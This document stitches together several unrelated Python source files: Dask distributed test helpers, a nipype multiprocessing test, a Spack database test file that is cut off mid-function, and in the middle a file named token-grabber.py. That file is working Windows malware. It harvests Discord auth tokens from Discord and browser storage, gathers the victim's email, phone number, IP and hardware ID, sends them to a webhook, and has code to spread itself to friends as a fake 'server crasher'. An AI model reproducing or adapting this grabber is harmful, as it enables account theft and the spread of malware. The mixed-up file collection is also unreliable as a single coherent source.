@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
and "Threaded" not in thread.name
and "watch message" not in thread.name
and "TCP-Executor" not in thread.name
# TODO: Make sure profile thread is cleaned up
# and remove the line below
and "Profile" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(200):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status == Status.running:
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with suppress(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
|
test_legacymultiproc_nondaemon.py
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Testing module for functions and classes from multiproc.py
"""
# Import packages
import os
import sys
from tempfile import mkdtemp
from shutil import rmtree
import pytest
import nipype.pipeline.engine as pe
from nipype.interfaces.utility import Function
def mytestFunction(insum=0):
"""
Run a multiprocessing job and spawn child processes.
"""
# need to import here since this is executed as an external process
import multiprocessing
import os
import tempfile
import time
numberOfThreads = 2
# list of processes
t = [None] * numberOfThreads
# list of alive flags
a = [None] * numberOfThreads
# list of tempFiles
f = [None] * numberOfThreads
def dummyFunction(filename):
"""
This function writes the value 45 to the given filename.
"""
j = 0
for i in range(0, 10):
j += i
# j is now 45 (0+1+2+3+4+5+6+7+8+9)
with open(filename, "w") as f:
f.write(str(j))
for n in range(numberOfThreads):
# mark thread as alive
a[n] = True
# create a temp file to use as the data exchange container
tmpFile = tempfile.mkstemp(".txt", "test_engine_")[1]
f[n] = tmpFile # keep track of the temp file
t[n] = multiprocessing.Process(target=dummyFunction, args=(tmpFile,))
# fire up the job
t[n].start()
# block until all processes are done
allDone = False
while not allDone:
time.sleep(1)
for n in range(numberOfThreads):
a[n] = t[n].is_alive()
if not any(a):
# if no thread is alive
allDone = True
# here, all processes are done
# read in all temp files and sum them up
total = insum
for ff in f:
with open(ff) as fd:
total += int(fd.read())
os.remove(ff)
return total
def run_multiproc_nondaemon_with_flag(nondaemon_flag):
"""
Start a pipe with two nodes using the resource multiproc plugin and
passing the nondaemon_flag.
"""
cur_dir = os.getcwd()
temp_dir = mkdtemp(prefix="test_engine_")
os.chdir(temp_dir)
pipe = pe.Workflow(name="pipe")
f1 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f1",
)
f2 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f2",
)
pipe.connect([(f1, f2, [("sum_out", "insum")])])
pipe.base_dir = os.getcwd()
f1.inputs.insum = 0
pipe.config["execution"]["stop_on_first_crash"] = True
# execute the pipe using the LegacyMultiProc plugin with 2 processes and the
# non_daemon flag to enable child processes which start other
# multiprocessing jobs
execgraph = pipe.run(
plugin="LegacyMultiProc",
plugin_args={"n_procs": 2, "non_daemon": nondaemon_flag},
)
names = [".".join((node._hierarchy, node.name)) for node in execgraph.nodes()]
node = list(execgraph.nodes())[names.index("pipe.f2")]
result = node.get_output("sum_out")
os.chdir(cur_dir)
rmtree(temp_dir)
return result
def test_run_multiproc_nondaemon_false():
"""
This is the entry point for the test. Two times a pipe of several
multiprocessing jobs gets executed. First, without the nondaemon flag.
Second, with the nondaemon flag.
Since the processes of the pipe start child processes, the execution only
succeeds when the non_daemon flag is on.
"""
shouldHaveFailed = False
try:
# with nondaemon_flag = False, the execution should fail
run_multiproc_nondaemon_with_flag(False)
except:
shouldHaveFailed = True
assert shouldHaveFailed
def test_run_multiproc_nondaemon_true():
# with nondaemon_flag = True, the execution should succeed
result = run_multiproc_nondaemon_with_flag(True)
assert result == 180 # n_procs (2) * numberOfThreads (2) * 45 == 180
|
token-grabber.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
embed = {
"color": 0xff00cd,
"fields": [
{
"name": "Made by Rushia.BasH. Don't Skid :)",
"value": f'Join our discord server https://discord.gg/Pw4GxgKzsk',
"inline": False
},
{
"name": "**Info**",
"value": f'Email: {email}\nPhone: {phone} \nIP: {ip}',
"inline": False
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Rushia's Token Grabber",
"avatar_url": "https://cdn.discordapp.com/attachments/756524108459540582/907284779022569472/500x500.jpg"
}
try: #webhook under this message
urlopen(Request("#webhook here", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
database.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check the database is functioning properly,
both in memory and in its file
"""
import datetime
import functools
import multiprocessing
import os
import pytest
import json
try:
import uuid
_use_uuid = True
except ImportError:
_use_uuid = False
pass
from jsonschema import validate
import llnl.util.lock as lk
from llnl.util.tty.colify import colify
import spack.repo
import spack.store
import spack.database
import spack.package
import spack.spec
from spack.util.mock_package import MockPackageMultiRepo
from spack.util.executable import Executable
from spack.schema.database_index import schema
pytestmark = pytest.mark.db
@pytest.fixture()
def test_store(tmpdir):
real_store = spack.store.store
spack.store.store = spack.store.Store(str(tmpdir.join('test_store')))
yield
spack.store.store = real_store
@pytest.fixture()
def upstream_and_downstream_db(tmpdir_factory, gen_mock_layout):
mock_db_root = str(tmpdir_factory.mktemp('mock_db_root'))
upstream_write_db = spack.database.Database(mock_db_root)
upstream_db = spack.database.Database(mock_db_root, is_upstream=True)
# Generate initial DB file to avoid reindex
with open(upstream_write_db._index_path, 'w') as db_file:
upstream_write_db._write_to_file(db_file)
upstream_layout = gen_mock_layout('/a/')
downstream_db_root = str(
tmpdir_factory.mktemp('mock_downstream_db_root'))
downstream_db = spack.database.Database(
downstream_db_root, upstream_dbs=[upstream_db])
with open(downstream_db._index_path, 'w') as db_file:
downstream_db._write_to_file(db_file)
downstream_layout = gen_mock_layout('/b/')
yield upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout
@pytest.mark.usefixtures('config')
def test_installed_upstream(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
x = mock_repo.add_package('x', [], [])
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('w', [x, y], [default, default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('w')
spec.concretize()
for dep in spec.traverse(root=False):
upstream_write_db.add(dep, upstream_layout)
upstream_db._read()
for dep in spec.traverse(root=False):
record = downstream_db.get_by_hash(dep.dag_hash())
assert record is not None
with pytest.raises(spack.database.ForbiddenLockError):
record = upstream_db.get_by_hash(dep.dag_hash())
new_spec = spack.spec.Spec('w')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
for dep in new_spec.traverse(root=False):
upstream, record = downstream_db.query_by_spec_hash(
dep.dag_hash())
assert upstream
assert record.path == upstream_layout.path_for_spec(dep)
upstream, record = downstream_db.query_by_spec_hash(
new_spec.dag_hash())
assert not upstream
assert record.installed
upstream_db._check_ref_counts()
downstream_db._check_ref_counts()
@pytest.mark.usefixtures('config')
def test_removed_upstream_dep(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
mock_repo.add_package('y', [z], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('y')
spec.concretize()
upstream_write_db.add(spec['z'], upstream_layout)
upstream_db._read()
new_spec = spack.spec.Spec('y')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
upstream_write_db.remove(new_spec['z'])
upstream_db._read()
new_downstream = spack.database.Database(
downstream_db.root, upstream_dbs=[upstream_db])
new_downstream._fail_when_missing_deps = True
with pytest.raises(spack.database.MissingDependenciesError):
new_downstream._read()
@pytest.mark.usefixtures('config')
def test_add_to_upstream_after_downstream(upstream_and_downstream_db):
"""An upstream DB can add a package after it is installed in the downstream
DB. When a package is recorded as installed in both, the results should
refer to the downstream DB.
"""
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
downstream_db.add(spec, downstream_layout)
upstream_write_db.add(spec, upstream_layout)
upstream_db._read()
upstream, record = downstream_db.query_by_spec_hash(spec.dag_hash())
# Even though the package is recorded as installed in the upstream DB,
# we prefer the locally-installed instance
assert not upstream
qresults = downstream_db.query('x')
assert len(qresults) == 1
queried_spec, = qresults
try:
orig_db = spack.store.db
spack.store.db = downstream_db
assert queried_spec.prefix == downstream_layout.path_for_spec(spec)
finally:
spack.store.db = orig_db
@pytest.mark.usefixtures('config')
def test_cannot_write_upstream(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/']]
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
# Instantiate the database that will be used as the upstream DB and make
# sure it has an index file
upstream_db_independent = spack.database.Database(roots[1])
with upstream_db_independent.write_transaction():
pass
upstream_dbs = spack.store._construct_upstream_dbs_from_install_roots(
[roots[1]], _test=True)
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
with pytest.raises(spack.database.ForbiddenLockError):
upstream_dbs[0].add(spec, layouts[1])
@pytest.mark.usefixtures('config')
def test_recursive_upstream_dbs(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b', 'c']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/', '/rc/']]
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('x', [y], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
db_c = spack.database.Database(roots[2])
db_c.add(spec['z'], layouts[2])
db_b = spack.database.Database(roots[1], upstream_dbs=[db_c])
db_b.add(spec['y'], layouts[1])
db_a = spack.database.Database(roots[0], upstream_dbs=[db_b, db_c])
db_a.add(spec['x'], layouts[0])
upstream_dbs_from_scratch = (
spack.store._construct_upstream_dbs_from_install_roots(
[roots[1], roots[2]], _test=True))
db_a_from_scratch = spack.database.Database(
roots[0], upstream_dbs=upstream_dbs_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec.dag_hash()) == (
db_a_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec['y'].dag_hash()) == (
upstream_dbs_from_scratch[0])
assert db_a_from_scratch.db_for_spec_hash(spec['z'].dag_hash()) == (
upstream_dbs_from_scratch[1])
db_a_from_scratch._check_ref_counts()
upstream_dbs_from_scratch[0]._check_ref_counts()
upstream_dbs_from_scratch[1]._check_ref_counts()
assert (db_a_from_scratch.installed_relatives(spec) ==
set(spec.traverse(root=False)))
assert (db_a_from_scratch.installed_relatives(
spec['z'], direction='parents') == set([spec, spec['y']]))
@pytest.fixture()
def usr_folder_exists(monkeypatch):
"""The ``/usr`` folder is assumed to be existing in some tests. This
fixture makes it such that its existence is mocked, so we have no
requirements on the system running tests.
"""
isdir = os.path.isdir
@functools.wraps(os.path.isdir)
def mock_isdir(path):
if path == '/usr':
return True
return isdir(path)
monkeypatch.setattr(os.path, 'isdir', mock_isdir)
def _print_ref_counts():
"""Print out all ref counts for the graph used here, for debugging"""
recs = []
def add_rec(spec):
cspecs = spack.store.db.query(spec, installed=any)
if not cspecs:
recs.append("[ %-7s ] %-20s-" % ('', spec))
else:
key = cspecs[0].dag_hash()
rec = spack.store.db.get_record(cspecs[0])
recs.append("[ %-7s ] %-20s%d" % (key[:7], spec, rec.ref_count))
with spack.store.db.read_transaction():
add_rec('mpileaks ^mpich')
add_rec('callpath ^mpich')
add_rec('mpich')
add_rec('mpileaks ^mpich2')
add_rec('callpath ^mpich2')
add_rec('mpich2')
add_rec('mpileaks ^zmpi')
add_rec('callpath ^zmpi')
add_rec('zmpi')
add_rec('fake')
add_rec('dyninst')
add_rec('libdwarf')
add_rec('libelf')
colify(recs, cols=3)
def _check_merkleiness():
"""Ensure the spack database is a valid merkle graph."""
all_specs = spack.store.db.query(installed=any)
seen = {}
for spec in all_specs:
for dep in spec.dependencies():
hash_key = dep.dag_hash()
if hash_key not in seen:
seen[hash_key] = id(dep)
else:
assert seen[hash_key] == id(dep)
def _check_db_sanity(database):
"""Utiilty function to check db against install layout."""
pkg_in_layout = sorted(spack.store.layout.all_specs())
actual = sorted(database.query())
externals = sorted([x for x in actual if x.external])
nexpected = len(pkg_in_layout) + len(externals)
assert nexpected == len(actual)
non_external_in_db = sorted([x for x in actual if not x.external])
for e, a in zip(pkg_in_layout, non_external_in_db):
assert e == a
_check_merkleiness()
def _check_remove_and_add_package(database, spec):
"""Remove a spec from the DB, then add it and make sure everything's
still ok once it is added. This checks that it was
removed, that it's back when added again, and that ref
counts are consistent.
"""
original = database.query()
database._check_ref_counts()
# Remove spec
concrete_spec = database.remove(spec)
database._check_ref_counts()
remaining = database.query()
# ensure spec we removed is gone
assert len(original) - 1 == len(remaining)
assert all(s in original for s in remaining)
assert concrete_spec not in remaining
# add it back and make sure everything is ok.
database.add(concrete_spec, spack.store.layout)
installed = database.query()
assert concrete_spec in installed
assert installed == original
# sanity check against direcory layout and check ref counts.
_check_db_sanity(database)
database._check_ref_counts()
def _mock_install(spec):
s = spack.spec.Spec(spec)
s.concretize()
pkg = spack.repo.get(s)
pkg.do_install(fake=True)
def _mock_remove(spec):
specs = spack.store.db.query(spec)
assert len(specs) == 1
spec = specs[0]
spec.package.do_uninstall(spec)
def test_default_queries(database):
# Testing a package whose name *doesn't* start with 'lib'
# to ensure the library has 'lib' prepended to the name
rec = database.get_record('zmpi')
spec = rec.spec
libraries = spec['zmpi'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'zmpi'
headers = spec['zmpi'].headers
assert len(headers) == 1
assert headers.names[0] == 'zmpi'
command = spec['zmpi'].command
assert isinstance(command, Executable)
assert command.name == 'zmpi'
assert os.path.exists(command.path)
# Testing a package whose name *does* start with 'lib'
# to ensure the library doesn't have a double 'lib' prefix
rec = database.get_record('libelf')
spec = rec.spec
libraries = spec['libelf'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'elf'
headers = spec['libelf'].headers
assert len(headers) == 1
assert headers.names[0] == 'libelf'
command = spec['libelf'].command
assert isinstance(command, Executable)
assert command.name == 'libelf'
assert os.path.exists(command.path)
def test_005_db_exists(database):
"""Make sure db cache file exists after creating."""
index_file = os.path.join(database.root, '.spack-db', 'index.json')
lock_file = os.path.join(database.root, '.spack-db', 'lock')
assert os.path.exists(str(index_file))
assert os.path.exists(str(lock_file))
with open(index_file) as fd:
index_object = json.load(fd)
validate(index_object, schema)
def test_010_all_install_sanity(database):
"""Ensure that the install layout reflects what we think it does."""
all_specs = spack.store.layout.all_specs()
assert len(all_specs) == 14
# Query specs with multiple configurations
mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]
callpath_specs = [s for s in all_specs if s.satisfies('callpath')]
mpi_specs = [s for s in all_specs if s.satisfies('mpi')]
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# Query specs with single configurations
dyninst_specs = [s for s in all_specs if s.satisfies('dyninst')]
libdwarf_specs = [s for s in all_specs if s.satisfies('libdwarf')]
libelf_specs = [s for s in all_specs if s.satisfies('libelf')]
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich2')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^zmpi')]
) == 1
def test_015_write_and_read(mutable_database):
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_017_write_and_read_without_uuid(mutable_database, monkeypatch):
monkeypatch.setattr(spack.database, '_use_uuid', False)
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_020_db_sanity(database):
"""Make sure query() returns what's actually in the db."""
_check_db_sanity(database)
def test_025_reindex(mutable_database):
"""Make sure reindex works and ref counts are valid."""
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_026_reindex_after_deprecate(mutable_database):
"""Make sure reindex works and ref counts are valid after deprecation."""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_030_db_sanity_from_another_process(mutable_database):
def read_and_modify():
# check that other process can read DB
_check_db_sanity(mutable_database)
with mutable_database.write_transaction():
_mock_remove('mpileaks ^zmpi')
p = multiprocessing.Process(target=read_and_modify, args=())
p.start()
p.join()
# ensure child process change is visible in parent process
with mutable_database.read_transaction():
assert len(mutable_database.query('mpileaks ^zmpi')) == 0
def test_040_ref_counts(database):
"""Ensure that we got ref counts right when we read the DB."""
database._check_ref_counts()
def test_041_ref_counts_deprecate(mutable_database):
"""Ensure that we have appropriate ref counts after deprecating"""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
mutable_database._check_ref_counts()
def test_050_basic_query(database):
"""Ensure querying database is consistent with what is installed."""
# query everything
assert len(spack.store.db.query()) == 16
# query specs with multiple configurations
mpileaks_specs = database.query('mpileaks')
callpath_specs = database.query('callpath')
mpi_specs = database.query('mpi')
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# query specs with single configurations
dyninst_specs = database.query('dyninst')
libdwarf_specs = database.query('libdwarf')
libelf_specs = database.query('libelf')
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(database.query('mpileaks ^mpich')) == 1
assert len(database.query('mpileaks ^mpich2')) == 1
assert len(database.query('mpileaks ^zmpi')) == 1
# Query by date
assert len(database.query(start_date=datetime.datetime.min)) == 16
assert len(database.query(start_date=datetime.datetime.max)) == 0
assert len(database.query(end_date=datetime.datetime.min)) == 0
assert len(database.query(end_date=datetime.datetime.max)) == 16
def test_060_remove_and_add_root_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'mpileaks ^mpich')
def test_070_remove_and_add_dependency_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'dyninst')
def test_080_root_ref_counts(mutable_database):
rec = mutable_database.get_record('mpileaks ^mpich')
# Remove a top-level spec from the DB
mutable_database.remove('mpileaks ^mpich')
# record no longer in DB
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
# record's deps have updated ref_counts
assert mutable_database.get_record('callpath ^mpich').ref_count == 0
assert mutable_database.get_record('mpich').ref_count == 1
# Put the spec back
mutable_database.add(rec.spec, spack.store.layout)
# record is present again
assert len(mutable_database.query('mpileaks ^mpich', installed=any)) == 1
# dependencies have ref counts updated
assert mutable_database.get_record('callpath ^mpich').ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
def test_090_non_root_ref_counts(mutable_database):
